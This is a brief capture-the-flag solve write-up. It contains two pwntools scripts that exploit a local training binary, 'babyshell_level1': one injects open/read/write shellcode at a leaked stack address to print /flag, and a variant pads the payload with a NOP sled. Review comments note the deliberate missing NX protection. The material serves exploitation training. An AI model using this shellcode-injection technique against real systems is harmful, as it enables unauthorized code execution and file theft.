1

from pwn import *
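# Solve script for the local training binary /challenge/babyshell_level1.
# The binary prints the stack address at which it places the bytes it is
# sent (the "[LEAK]" line). The payload built below opens /flag, reads it
# into a scratch area and writes that area to stdout.
# NOTE(review): this relies on the binary both disclosing a stack address and
# running caller-supplied bytes from the stack -- presumably deliberate in
# this exercise. A non-executable stack (NX / W^X) is the mitigation this
# level illustrates by its absence.
context.log_level = 'info'

r = process("/challenge/babyshell_level1")

# Tubes operate on bytes; a str argument makes pwntools emit a BytesWarning
# on Python 3 and encode it implicitly, so pass a bytes literal.
r.recvuntil(b"[LEAK] Placing shellcode on the stack at 0x")
# The remainder of the line is the hex address. [:-2] drops the last two
# bytes -- presumably a trailing punctuation character plus the newline;
# confirm against the binary's actual output.
addr = int(r.recvline()[:-2], 16)
log.success("addr => {}".format(hex(addr)))

# open() leaves the file descriptor in rax, which read() then takes as its
# fd argument. The buffer sits 0x100 bytes past the leaked address; this
# assumes the assembled payload is shorter than 0x100 bytes so the read does
# not overwrite the running code -- TODO confirm.
shellcode = shellcraft.amd64.open("/flag")
shellcode += shellcraft.amd64.read('rax', addr + 0x100, 0x100)
# write() always emits the full 0x100 bytes to fd 1, so the output also
# contains whatever follows the file contents in that buffer.
shellcode += shellcraft.amd64.write(1, addr + 0x100, 0x100)

payload = asm(shellcode, arch='amd64')

# Consume whatever the binary has printed so far (presumably its prompt)
# before sending; sendline() appends a newline after the payload.
r.recv()
r.sendline(payload)
r.interactive()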

2

# Replacement for the payload line of the first script: the same assembled
# code, left-padded with 0x90 bytes (the single-byte x86 NOP) to a total
# length of 0x900.
# NOTE(review): the page does not say why the padding is needed; presumably
# this level starts execution at a varying offset inside the buffer -- confirm.
assembled = asm(shellcode, arch='amd64')
payload = assembled.rjust(0x900, b'\x90')

Q.E.D.

